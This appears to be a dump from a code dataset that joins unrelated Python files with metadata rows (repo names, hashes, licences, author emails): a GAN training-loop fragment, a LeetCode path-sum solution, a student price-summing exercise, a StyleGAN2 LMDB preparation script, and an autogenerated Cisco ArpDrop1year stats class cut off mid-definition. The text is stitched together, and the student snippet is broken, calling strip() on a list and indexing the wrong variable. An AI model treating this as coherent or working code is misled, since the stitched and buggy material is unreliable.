0.1 * encode_adversarial_loss(encode_discriminator(encode_fake_B), encode_valid) + \
lambda_task * task_loss_
g_loss.backward()
optimizer_G.step()
# ---------------------
# Train Discriminator
# ---------------------
optimizer_D.zero_grad()
imgs_B_x, encode_real_B = source_encode_generator(imgs_B, z)
decode_real_B = decode_generator(imgs_B_x, encode_real_B)
# Measure discriminator's ability to classify real from generated samples
encode_real_loss = encode_adversarial_loss(encode_discriminator(encode_real_B), encode_valid)
encode_fake_loss = encode_adversarial_loss(encode_discriminator(encode_fake_B.detach()), encode_fake)
decode_real_loss = adversarial_loss(discriminator(decode_real_B), valid)
decode_fake_loss = adversarial_loss(discriminator(decode_fake_B.detach()), fake)
encode_d_loss = (encode_real_loss + encode_fake_loss) / 2
decode_d_loss = (decode_real_loss + decode_fake_loss) / 2
d_loss = encode_d_loss + decode_d_loss
d_loss.backward()
optimizer_D.step()
# ---------------------------------------
# Evaluate Performance on target domain
# ---------------------------------------
# Evaluate performance on translated Domain A
acc = np.mean(np.argmax(label_pred.data.cpu().numpy(), axis=1) == labels_A.data.cpu().numpy())
task_performance.append(acc)
if len(task_performance) > 100:
task_performance.pop(0)
# Evaluate performance on Domain B
pred_B = classifier(imgs_B)
target_acc = np.mean(np.argmax(pred_B.data.cpu().numpy(), axis=1) == labels_B.numpy())
target_performance.append(target_acc)
if len(target_performance) > 100:
target_performance.pop(0)
print ("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f] [CLF acc: %3d%% (%3d%%), target_acc: %3d%% (%3d%%)]" %
(epoch, opt.n_epochs,
i, len(dataloader_A),
d_loss.item(), g_loss.item(),
100*acc, 100*np.mean(task_performance),
100*target_acc, 100*np.mean(target_performance)))
batches_done = len(dataloader_A) * epoch + i
if batches_done % opt.sample_interval == 0:
sample = torch.cat((imgs_A.data[:5], decode_fake_B.data[:5], imgs_B.data[:5]), -2)
save_image(sample, 'images/%d.png' % batches_done, nrow=int(math.sqrt(batch_size)), normalize=True)
| [
"dolpal2@gmail.com"
] | dolpal2@gmail.com |
05391db40e348f679bd0fb7f3aff7fb9312e86dc | 6515dee87efbc5edfbf4c117e262449999fcbb50 | /cn/437.py | 9db648c3425be2e1fcd9d392cba20e26e2e594f9 | [] | no_license | wangyunge/algorithmpractice | 24edca77e180854b509954dd0c5d4074e0e9ef31 | 085b8dfa8e12f7c39107bab60110cd3b182f0c13 | refs/heads/master | 2021-12-29T12:55:38.096584 | 2021-12-12T02:53:43 | 2021-12-12T02:53:43 | 62,696,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution(object):
def pathSum(self, root, targetSum):
"""
:type root: TreeNode
:type targetSum: int
:rtype: int
"""
self.res = 0
def _dfs(node, table, cul):
if node:
cul += node.val
if cul - targetSum in table:
self.res += table[cul-targetSum]
if cul in table:
table[cul] += 1
else:
table[cul] = 1
_dfs(node.left, table, cul)
_dfs(node.right, table, cul)
table[cul] -= 1
_dfs(root, {0:1}, 0) # B arr need a start
return self.res
| [
"wangyunge1@yahoo.com"
] | wangyunge1@yahoo.com |
2ce8806bfe4f7d6fc569bc79af8db82d2fc93e01 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_083/ch87_2020_06_22_18_11_23_637038.py | a6ce84b797d6cb26843f6f35d6d9f2edd6852dc2 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | preco_total = 0
with open('churras.txt', 'r') as arquivo:
conteudo = arquivo.readlines()
for contador in conteudo:
listas = conteudo.strip()
lista = listas.split(',')
preco_total += int(listas[1])*float(listas[2])
print(preco_total) | [
"you@example.com"
] | you@example.com |
6e84f34b20b277f4cc2f6eed0c7053350f95dd5d | 0f8bb3285ae796ad0c000fb7f0d897bf9d92aef3 | /prepare_data.py | 0fc88eeb4834c5c2a6e425d93e78f9c45049e96b | [
"MIT",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | viuts/stylegan2-pytorch | 3e23479ec53d5d8f39fcae6f5b95c2bb1f005a88 | 2fdd10b3e9e3261390032963c59646cd298a60b1 | refs/heads/master | 2020-12-04T22:04:35.950846 | 2020-01-11T05:08:35 | 2020-01-11T05:08:35 | 231,915,562 | 0 | 0 | NOASSERTION | 2020-01-05T12:40:25 | 2020-01-05T12:40:24 | null | UTF-8 | Python | false | false | 2,189 | py | import argparse
from io import BytesIO
import multiprocessing
from functools import partial
from PIL import Image
import lmdb
from tqdm import tqdm
from torchvision import datasets
from torchvision.transforms import functional as trans_fn
def resize_and_convert(img, size, quality=100):
img = trans_fn.resize(img, size, Image.LANCZOS)
img = trans_fn.center_crop(img, size)
buffer = BytesIO()
img.save(buffer, format='jpeg', quality=quality)
val = buffer.getvalue()
return val
def resize_multiple(img, sizes=(128, 256, 512, 1024), quality=100):
imgs = []
for size in sizes:
imgs.append(resize_and_convert(img, size, quality))
return imgs
def resize_worker(img_file, sizes):
i, file = img_file
img = Image.open(file)
img = img.convert('RGB')
out = resize_multiple(img, sizes=sizes)
return i, out
def prepare(transaction, dataset, n_worker, sizes=(128, 256, 512, 1024)):
resize_fn = partial(resize_worker, sizes=sizes)
files = sorted(dataset.imgs, key=lambda x: x[0])
files = [(i, file) for i, (file, label) in enumerate(files)]
total = 0
with multiprocessing.Pool(n_worker) as pool:
for i, imgs in tqdm(pool.imap_unordered(resize_fn, files)):
for size, img in zip(sizes, imgs):
key = f'{size}-{str(i).zfill(5)}'.encode('utf-8')
transaction.put(key, img)
total += 1
transaction.put('length'.encode('utf-8'), str(total).encode('utf-8'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--out', type=str)
parser.add_argument('--size', type=str, default='128,256,512,1024')
parser.add_argument('--n_worker', type=int, default=8)
parser.add_argument('path', type=str)
args = parser.parse_args()
sizes = [int(s.strip()) for s in args.size.split(',')]
print(f'Make dataset of image sizes:', ', '.join(str(s) for s in sizes))
imgset = datasets.ImageFolder(args.path)
with lmdb.open(args.out, map_size=1024 ** 4, readahead=False) as env:
with env.begin(write=True) as txn:
prepare(txn, imgset, args.n_worker, sizes=sizes)
| [
"kim.seonghyeon@snu.ac.kr"
] | kim.seonghyeon@snu.ac.kr |
1e4a47dbddec9e8e9aea682ee7b2c0fd3003f97c | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/copp/arpdrop1year.py | 3bffde23d40d502aac18f85c8cd0529f3385b7c4 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,909 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class ArpDrop1year(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.copp.ArpDrop1year", "Per Interface Drop Counters for Arp")
counter = CounterMeta("bytesRate", CounterCategory.GAUGE, "bytes-per-second", "ArpDropped Bytes rate")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "bytesRateLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "bytesRateMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "bytesRateMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "bytesRateAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "bytesRateSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "bytesRateTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "bytesRateThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "bytesRateTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "bytesRateTr"
meta._counters.append(counter)
counter = CounterMeta("bytes", CounterCategory.COUNTER, "bytes", "ArpDropped Bytes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "bytesLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "bytesCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "bytesPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "bytesMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "bytesMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "bytesAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "bytesSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "bytesBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "bytesThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "bytesTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "bytesTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "bytesRate"
meta._counters.append(counter)
counter = CounterMeta("pktsRate", CounterCategory.GAUGE, "packets-per-second", "ArpDropped Packets rate")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "pktsRateLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pktsRateMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pktsRateMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pktsRateAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pktsRateSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "pktsRateTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pktsRateThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "pktsRateTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pktsRateTr"
meta._counters.append(counter)
counter = CounterMeta("pkts", CounterCategory.COUNTER, "packets", "ArpDropped Packets")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "pktsLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "pktsCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "pktsPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pktsMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pktsMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pktsAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pktsSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "pktsBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pktsThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "pktsTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pktsTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "pktsRate"
meta._counters.append(counter)
meta.moClassName = "coppArpDrop1year"
meta.rnFormat = "CDcoppArpDrop1year"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Per Interface Drop Counters for Arp stats in 1 year"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.svi.If")
meta.parentClasses.add("cobra.model.pc.AggrIf")
meta.parentClasses.add("cobra.model.l1.PhysIf")
meta.parentClasses.add("cobra.model.l3.RtdIf")
meta.parentClasses.add("cobra.model.l3.EncRtdIf")
meta.superClasses.add("cobra.model.copp.ArpDrop")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.rnPrefixes = [
('CDcoppArpDrop1year', False),
]
prop = PropMeta("str", "bytesAvg", "bytesAvg", 31338, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Bytes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesAvg", prop)
prop = PropMeta("str", "bytesBase", "bytesBase", 31333, PropCategory.IMPLICIT_BASELINE)
prop.label = "ArpDropped Bytes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesBase", prop)
prop = PropMeta("str", "bytesCum", "bytesCum", 31334, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "ArpDropped Bytes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesCum", prop)
prop = PropMeta("str", "bytesLast", "bytesLast", 31332, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Bytes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesLast", prop)
prop = PropMeta("str", "bytesMax", "bytesMax", 31337, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Bytes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesMax", prop)
prop = PropMeta("str", "bytesMin", "bytesMin", 31336, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Bytes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesMin", prop)
prop = PropMeta("str", "bytesPer", "bytesPer", 31335, PropCategory.IMPLICIT_PERIODIC)
prop.label = "ArpDropped Bytes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesPer", prop)
prop = PropMeta("str", "bytesRate", "bytesRate", 31343, PropCategory.IMPLICIT_RATE)
prop.label = "ArpDropped Bytes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRate", prop)
prop = PropMeta("str", "bytesRateAvg", "bytesRateAvg", 31356, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Bytes rate average value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateAvg", prop)
prop = PropMeta("str", "bytesRateLast", "bytesRateLast", 31353, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Bytes rate current value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateLast", prop)
prop = PropMeta("str", "bytesRateMax", "bytesRateMax", 31355, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Bytes rate maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateMax", prop)
prop = PropMeta("str", "bytesRateMin", "bytesRateMin", 31354, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Bytes rate minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateMin", prop)
prop = PropMeta("str", "bytesRateSpct", "bytesRateSpct", 31357, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Bytes rate suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateSpct", prop)
prop = PropMeta("str", "bytesRateThr", "bytesRateThr", 31359, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Bytes rate thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("bytesRateThr", prop)
prop = PropMeta("str", "bytesRateTr", "bytesRateTr", 31361, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Bytes rate trend"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateTr", prop)
prop = PropMeta("str", "bytesRateTrBase", "bytesRateTrBase", 31360, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Bytes rate trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateTrBase", prop)
prop = PropMeta("str", "bytesRateTtl", "bytesRateTtl", 31358, PropCategory.IMPLICIT_TOTAL)
prop.label = "ArpDropped Bytes rate total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateTtl", prop)
prop = PropMeta("str", "bytesSpct", "bytesSpct", 31339, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Bytes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesSpct", prop)
prop = PropMeta("str", "bytesThr", "bytesThr", 31340, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Bytes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("bytesThr", prop)
prop = PropMeta("str", "bytesTr", "bytesTr", 31342, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Bytes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesTr", prop)
prop = PropMeta("str", "bytesTrBase", "bytesTrBase", 31341, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Bytes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesTrBase", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "pktsAvg", "pktsAvg", 31374, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Packets average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsAvg", prop)
prop = PropMeta("str", "pktsBase", "pktsBase", 31369, PropCategory.IMPLICIT_BASELINE)
prop.label = "ArpDropped Packets baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsBase", prop)
prop = PropMeta("str", "pktsCum", "pktsCum", 31370, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "ArpDropped Packets cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsCum", prop)
prop = PropMeta("str", "pktsLast", "pktsLast", 31368, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Packets current value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsLast", prop)
prop = PropMeta("str", "pktsMax", "pktsMax", 31373, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Packets maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsMax", prop)
prop = PropMeta("str", "pktsMin", "pktsMin", 31372, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Packets minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsMin", prop)
prop = PropMeta("str", "pktsPer", "pktsPer", 31371, PropCategory.IMPLICIT_PERIODIC)
prop.label = "ArpDropped Packets periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsPer", prop)
prop = PropMeta("str", "pktsRate", "pktsRate", 31379, PropCategory.IMPLICIT_RATE)
prop.label = "ArpDropped Packets rate"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRate", prop)
prop = PropMeta("str", "pktsRateAvg", "pktsRateAvg", 31392, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Packets rate average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateAvg", prop)
prop = PropMeta("str", "pktsRateLast", "pktsRateLast", 31389, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Packets rate current value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateLast", prop)
prop = PropMeta("str", "pktsRateMax", "pktsRateMax", 31391, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Packets rate maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateMax", prop)
prop = PropMeta("str", "pktsRateMin", "pktsRateMin", 31390, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Packets rate minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateMin", prop)
prop = PropMeta("str", "pktsRateSpct", "pktsRateSpct", 31393, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Packets rate suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateSpct", prop)
prop = PropMeta("str", "pktsRateThr", "pktsRateThr", 31395, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Packets rate thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
